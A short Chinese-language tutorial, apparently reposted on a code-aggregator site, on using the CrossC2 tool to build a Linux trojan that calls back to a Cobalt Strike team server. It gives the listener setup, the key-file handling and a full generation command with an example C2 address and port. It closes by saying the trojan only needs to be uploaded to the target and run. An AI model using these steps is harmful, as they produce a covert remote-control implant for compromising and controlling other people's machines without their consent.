当前位置: 代码迷 >> 综合 >> cobaltstrike linux上线方法
  详细解决方案

cobaltstrike linux上线方法

热度:74   发布时间:2023-12-24 19:38:08.0

这里介绍一个cobaltstrike-linux 上线的工具genCrossC2

我们要通过这个工具生成一个linux的木马,用于cobaltstrike的统一管理

注意事项

首先要注意一点,CrossC2暂时只支持到cobaltstrike3.14版本,4版本因为协议的问题,可以上线但不能执行命令(现已支持4.1版本)。两种版本的配置过程是一样的。

准备环境如下:

第一步:我们要先将cobaltstrike的监听器打开,CrossC2暂时只支持HTTPS的监听器

这里要注意创建完这个监听器后在你的cobaltstrike的根目录下面会生成一个的隐藏文件

第二步:

 在https://github.com/gloxec/CrossC2  上面下载这个工具,解压放到cobaltstrike的根目录下面

将这个隐藏文件复制到 CrossC2/src 下面(不放也行只要记得路径就可以)

 第三步:生成木马

./genCrossC2.Linux 【cobaltstrike地址】【https的端口】 【秘钥文件】null Linux x64【输出路径】

例子:./genCrossC2.Linux 192.168.1.1 443 cobaltstrike.beacon_keys null Linux x64 /tmp/linux.cs

 到此为止我们的木马就生成完了,只需要将这个木马上传到目标机执行即可。